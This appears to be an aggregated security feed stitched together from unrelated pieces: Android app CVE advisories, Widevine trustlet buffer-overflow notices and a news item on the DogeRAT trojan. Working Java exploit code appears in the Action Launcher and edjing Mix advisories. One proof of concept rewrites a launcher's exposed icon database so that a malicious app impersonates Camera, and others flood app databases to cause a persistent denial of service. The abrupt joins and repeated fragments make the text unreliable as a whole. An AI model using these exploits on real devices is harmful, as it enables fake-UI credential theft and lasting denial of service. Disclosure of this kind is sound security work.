An issue was found in Action Launcher v50.5 allows an attacker to escalate privilege via modification of the intent string to function update.

**Escalation of Privileges exists in Action Launcher（CVE-2022-47029）**

Vendor: Action Launcher(https://actionlauncher.com/)

Affected product: Action Launcher(com.actionlauncher.playstore)

Version: 50.5

Download link：https://play.google.com/store/apps/details?id=com.actionlauncher.playstore&hl=en

Description of the vulnerability for use in the CVE：Action Launcher v50.5 allows unauthorized apps to tamper with the icons on the desktop and their corresponding apps, allowing attackers to defraud users by launching a fake UI.

Additional information: The favorite table in the exposed database stores the icon information presented on the screen such as name, icon picture, and location coordinate. The intent string in the table is used to start the MainActivity of a target app. An unauthorized app can modify the intent data to defraud users by launching a fake UI, further stealing user-sensitive information. Besides, attackers can directly manipulate the icon name, picture, and location coordinate on the desktop to replace the app to start.

poc:

 public void attack\_update\_launcher() {
        //Fake a malicious app as Google Camera. When user launch Google Camera, a malicious app is start!
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.actionlauncher.playstore.settings/favorites");
        ContentValues contentValues = new ContentValues();
        contentValues.put("title", "Camera");
        //Forge a malicious Intent to launch a malicious application
        contentValues.put("intent",
                "#Intent;action=android.intent.action.MAIN;category=android.intent.category.LAUNCHER;launchFlags=0x10200000;package=com.attack" +
                        ";component=com.attack/com.attack.MainActivity;end");
        //The position of Google Camera app in Action Launcher database
        String\[\] s = {"5"};
        contentValues.put("screen", 0);
        contentValues.put("container", -101);
        contentValues.put("cellX", 4);
        contentValues.put("cellY", 0);
        contentValues.put("spanX", 1);
        contentValues.put("spanY", 1);
        contentValues.put("itemType", 0);
        contentValues.put("iconType", 1);
        contentValues.put("iconPackage", "com.actionlauncher.playstore");
        contentValues.put("iconResource", "com.actionlauncher.playstore:drawable/ic\_allapps");
        //Must update the icon filed use an icon same as Google Camera, or the Google Camera's icon will change.
        Drawable drawable = getApplicationContext().getResources().getDrawable(R.drawable.attack);
        BitmapDrawable bd = (BitmapDrawable) drawable;
        Bitmap bitmap = bd.getBitmap();
        ByteArrayOutputStream os = new ByteArrayOutputStream();
        bitmap.compress(Bitmap.CompressFormat.PNG, 100, os);
        byte\[\] bytes = os.toByteArray();
        contentValues.put("icon", bytes);
        contentResolver.update(uri, contentValues, "\_id=?", s);
    }

CVE-2022-47029: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue discovered in Action Launcher for Android v50.5 allows an attacker to cause a denial of service via arbitary data injection to function insert.

**Denial of Service exists in Action Launcher（CVE-2022-47028）**

Vendor: Action Launcher(https://actionlauncher.com/)

Affected product: Action Launcher (com.actionlauncher.playstore)

Version: 50.5

Download link: https://play.google.com/store/apps/details?id=com.actionlauncher.playstore&hl=en

Description of the vulnerability for use in the CVE: Action Launcher v50.5 allows unauthorized apps to inject a large number of data into its database, which will be loaded to memory when the app is opened. The launcher app fails to display the home screens and cannot respond to any user actions , resulting in a permanent Denial of Service (DoS).

Additional information：The app is a launcher app, which can be set by users as phone default launcher. When the launcher app is opened, it sets up home screens by loading saved data from the database to memory. If a malicious app injects a large size of data into the database, the launcher app will get stuck in the initialization phase due to loading a large amount of data in the UI thread. Worse still, users cannot fix the security issue even when rebooting victim devices, since the injected data is persistent in the database. In practice, the launcher app fails to display the home screens and cannot respond to any user actions.

poc:

public void attack\_lancher() {
    ContentResolver contentResolver =getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.actionlauncher.playstore.settings/favorites");
    for (int i = 0; i < Long.MAX\_VALUE; i++) {
         ContentValues contentValues = new ContentValues();
         contentValues.put("screen", i);
         contentValues.put("title", getRandomString(102400));
         contentResolver.insert(uri, contentValues);
     }
}

CVE-2022-47028: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in edjing Mix v.7.09.01 for Android allows a local attacker to cause a denial of service via the database files.

**Denial of Service exists in edjing Mix（CVE-2023-29735）**

Vendor：MWM(http://www.edjing.com/)

Affected product：edjing Mix(com.edjing.edjingdjturntable)

Version：7.09.01

Download link：https://play.google.com/store/apps/details?id=com.edjing.edjingdjturntable

Description of the vulnerability for use in the CVE：An issue found in edjing Mix v.7.09.01 for Android allows a local attacker to cause a denial of service via the database files.

poc：

public void attack(){
    int num = 2;
    while (true) {
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        String randomString =getRandomString(52);
        String randomString2 =getRandomString(5120);
        Uri uri = Uri.parse("content://com.edjing.edjingdjturntable/playlist");
        ContentValues contentValues = new ContentValues();
        contentValues.put("playlist\_id",num);
        contentValues.put("playlist\_date\_modified",1314234);
        contentValues.put("playlist\_date\_added",123456);
        contentValues.put("playlist\_state",0);
        contentValues.put("playlist\_name",randomString2);
        contentResolver.insert(uri,contentValues);
        num ++;
    }
}

public static String getRandomString(int length) {
        String str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        Random random = new Random();
        StringBuffer sb = new StringBuffer();
        for (int i = 0; i < length; i++) {
            int number = random.nextInt(62);
            sb.append(str.charAt(number));
        }
        return sb.toString();
}

CVE-2023-29735: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs

Widevine Trustlet versions 5.x, 6.x, and 7.x suffer from a buffer overflow vulnerability in PRDiagParseAndStoreData at 0x5cc8.

    1. INFORMATION--------------[+] CVE                : CVE-2022-48336[+] Title              : Buffer Overflow in Widevine Trustlet (PRDiagParseAndStoreData @ 0x5cc8)[+] Vendor             : Google[+] Device             : Nexus 6[+] Affected component : Widevine[+] Publication date   : March 2023[+] Credits            : CyberIntel Team2. AFFECTED VERSIONS--------------------5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M), 5.1.1 (LYZ28N), 6.0.0 (MRA58K), 6.0.0 (MRA58N), 6.0.0 (MRA58R), 6.0.0 (MRA58X), 7.0.0 (NBD90Z), 7.0.0 (NBD91P), 7.0.0 (NBD91U), 7.0.0 (NBD91X), 7.0.0 (NBD91Y), 7.0.0 (NBD91Z), 7.0.0 (NBD92F), 7.0.0 (NBD92G), 7.1.1 (N6F26Q), 7.1.1 (N6F26R), 7.1.1 (N6F26U), 7.1.1 (N6F27C), 7.1.1 (N6F27E).3. DETAILS----------Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series. Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices. An attacker with high privileges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system. On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.The bug is present in Widevine’s PRDiagProvisionDataHandler() command.For more details and full proof of concept visit https://cyberintel.es/cve/CVE-2022-48336_Buffer_Overflow_in_Widevine_PRDiagParseAndStoreData_0x5cc8/--Cyber Intel Team.Zero Lab - https://cyberintel.es/

Widevine Trustlet 5.x / 6.x / 7.x PRDiagParseAndStoreData Buffer Overflow

Widevine Trustlet versions 5.x, 6.x, and 7.x suffer from a buffer overflow vulnerability in PRDiagVerifyProvisioning at 0x5f90.

    1. INFORMATION--------------[+] CVE                : CVE-2022-48335[+] Title              : Buffer Overflow in Widevine Trustlet (PRDiagVerifyProvisioning @ 0x5f90)[+] Vendor             : Google[+] Device             : Nexus 6[+] Affected component : Widevine[+] Publication date   : March 2023[+] Credits            : CyberIntel Team2. AFFECTED VERSIONS--------------------5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M), 5.1.1 (LYZ28N), 6.0.0 (MRA58K), 6.0.0 (MRA58N), 6.0.0 (MRA58R), 6.0.0 (MRA58X), 7.0.0 (NBD90Z), 7.0.0 (NBD91P), 7.0.0 (NBD91U), 7.0.0 (NBD91X), 7.0.0 (NBD91Y), 7.0.0 (NBD91Z), 7.0.0 (NBD92F), 7.0.0 (NBD92G), 7.1.1 (N6F26Q), 7.1.1 (N6F26R), 7.1.1 (N6F26U), 7.1.1 (N6F27C), 7.1.1 (N6F27E).3. DETAILS----------To the best of our knowledge, the vulnerability described in this post has been incorrectly associated with CVE-2015-6639. After consulting with MITRE, it has been confirmed that this vulnerability had no assigned identifier. Consequently, CVE-2022-48335 has been assigned to this vulnerability. On the other hand, it has been confirmed that CVE-2015-6639 does exist and corresponds with a different vulnerability reported by Google. We have notified all the concerned parties about this misunderstanding so that the confusion can be amended.Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series. Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices. An attacker with high privileges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system. On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.The bug is present in Widevine’s PRDiagVerifyProvisioning() command. This command closely resembles PRDiagClearProvisioning(), which has been featured in other blog entries (refer to CVE-2015-6647).For more details and full proof of concept visit https://cyberintel.es/cve/CVE-2022-48335_Buffer_Overflow_in_Widevine_PRDiagVerifyProvisioning_0x5f90/--Cyber Intel Team.Zero Lab - https://cyberintel.es/

Widevine Trustlet 5.x / 6.x / 7.x PRDiagVerifyProvisioning Buffer Overflow

Widevine Trustlet versions 5.x suffer from a buffer overflow vulnerability in drm_verify_keys at 0x7370.

    1. INFORMATION--------------[+] CVE                : CVE-2022-48334[+] Title              : Buffer Overflow in Widevine Trustlet (drm_verify_keys @ 0x7370)[+] Vendor             : Google[+] Device             : Nexus 6[+] Affected component : Widevine[+] Publication date   : March 2023[+] Credits            : CyberIntel Team2. AFFECTED VERSIONS--------------------5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M), 5.1.1 (LYZ28N)3. DETAILS----------Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series. Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices. An attacker with high privileges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system. On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.The bug is present in Widevine’s drm_verify_keys() command. This command closely resembles drm_save_keys(), which has been featured in other blog entries (refer to CVE-2022-48331 and CVE-2022-48332).For more details and full proof of concept visit https://cyberintel.es/cve/CVE-2022-48334_Buffer_Overflow_in_Widevine_drm_verify_keys_0x7370/--Cyber Intel Team.Zero Lab - https://cyberintel.es/

Widevine Trustlet 5.x drm_verify_keys Buffer Overflow

Widevine Trustlet versions 5.x suffer from a buffer overflow vulnerability in drm_verify_keys at 0x730c.

    1. INFORMATION--------------[+] CVE                : CVE-2022-48333[+] Title              : Buffer Overflow in Widevine Trustlet (drm_verify_keys @ 0x730c)[+] Vendor             : Google[+] Device             : Nexus 6[+] Affected component : Widevine[+] Publication date   : March 2023[+] Credits            : CyberIntel Team2. AFFECTED VERSIONS--------------------5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M), 5.1.1 (LYZ28N)3. DETAILS----------Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series. Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices. An attacker with high privileges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system. On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.The bug is present in Widevine’s drm_verify_keys() command. This command closely resembles drm_save_keys(), which has been featured in other blog entries (refer to CVE-2022-48331 and CVE-2022-48332).For more details and full proof of concept visit https://cyberintel.es/cve/CVE-2022-48333_Buffer_Overflow_in_Widevine_drm_verify_keys_0x730c/--Cyber Intel Team.Zero Lab - https://cyberintel.es/

Widevine Trustlet versions 5.x suffer from a buffer overflow vulnerability in drm_save_keys at 0x6a18.

    1. INFORMATION--------------[+] CVE                : CVE-2022-48332[+] Title              : Buffer Overflow in Widevine Trustlet (drm_save_keys @ 0x6a18)[+] Vendor             : Google[+] Device             : Nexus 6[+] Affected component : Widevine[+] Publication date   : March 2023[+] Credits            : CyberIntel Team2. AFFECTED VERSIONS--------------------5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M), 5.1.1 (LYZ28N)3. DETAILS----------Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series. Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices. An attacker with high privileges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system. On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.The bug is present in Widevine’s drm_save_keys() command. This command closely resembles drm_verify_keys(), which has been featured in other blog entries (refer to CVE-2022-48333 and CVE-2022-48334).For more details and full proof of concept visit https://cyberintel.es/cve/CVE-2022-48332_Buffer_Overflow_in_Widevine_drm_save_keys_0x6a18/--Cyber Intel Team.Zero Lab - https://cyberintel.es/

Widevine Trustlet 5.x drm_save_keys Buffer Overflow

Widevine Trustlet versions 5.x suffer from a drm_save_keys related buffer overflow.

    1. INFORMATION--------------[+] CVE                : CVE-2022-48331[+] Title              : Buffer Overflow in Widevine Trustlet (drm_save_keys @ 0x69b0)[+] Vendor             : Google[+] Device             : Nexus 6[+] Affected component : Widevine[+] Publication date   : March 2023[+] Credits            : CyberIntel Team2. AFFECTED VERSIONS--------------------5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M) 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M), 5.1.1 (LYZ28N)3. DETAILS----------Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series. Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices. An attacker with high privileges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system. On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service. The bug is present in Widevine’s drm_save_keys() command. This command closely resembles drm_verify_keys(), which has been featured in other blog entries (refer to CVE-2022-48333 and CVE-2022-48334).For more details and full proof of concept visit https://cyberintel.es/cve/CVE-2022-48331_Buffer_Overflow_in_Widevine_drm_save_keys_0x69b0/--Cyber Intel Team.Zero Lab - https://cyberintel.es/

A new open source remote access trojan (RAT) called DogeRAT targets Android users primarily located in India as part of a sophisticated malware campaign.
The malware is distributed via social media and messaging platforms under the guise of legitimate applications like Opera Mini, OpenAI ChatGOT, and Premium versions of YouTube, Netflix, and Instagram.
"Once installed on a victim's device, the

Mobile Security / Android

A new open source remote access trojan (RAT) called **DogeRAT** targets Android users primarily located in India as part of a sophisticated malware campaign.

The malware is distributed via social media and messaging platforms under the guise of legitimate applications like Opera Mini, OpenAI ChatGOT, and Premium versions of YouTube, Netflix, and Instagram.

"Once installed on a victim's device, the malware gains unauthorized access to sensitive data, including contacts, messages, and banking credentials," cybersecurity firm CloudSEK said in a Monday report.

"It can also take control of the infected device, enabling malicious actions such as sending spam messages, making unauthorized payments, modifying files, and even remotely capturing photos through the device's cameras."

DogeRAT, like many other malware-as-a-service (MaaS) offerings, is promoted by its India-based developer through a Telegram channel that has more than 2,100 subscribers since it was created on June 9, 2022.

This also includes a premium subscription that's sold for dirt-cheap prices ($30) with additional capabilities such as taking screenshots, stealing images, capturing clipboard content, and logging keystrokes.

In a further attempt to make it more accessible to other criminal actors, the free version of DogeRAT has been made available on GitHub, alongside screenshots and video tutorials showcasing its functions.

"We do not endorse any illegal or unethical use of this tool," the developer states in the repository's README.md file. "The user assumes all responsibility for the use of this software."

Upon installation, the Java-based malware requests for intrusive permissions to perform its data-gathering objectives, before exfiltrating it to a Telegram bot.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

"This campaign is a stark reminder of the financial motivation driving scammers to continually evolve their tactics," CloudSEK researcher Anshuman Das said.

"They are not just limited to creating phishing websites, but also distributing modified RATs or repurposing malicious apps to execute scam campaigns that are low-cost and easy to set up, yet yield high returns."

The findings come as Google-owned Mandiant detailed a new Android backdoor called LEMONJUICE that's designed to enable remote control of and access to a compromised device.

"The malware is capable of tracking device location, recording the microphone, retrieving contact lists, accessing call, SMS, clipboard, and notification logs, viewing installed applications, downloading and uploading files, viewing connectivity status, and executing additional commands from the C2 server," researcher Jared Wilson said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google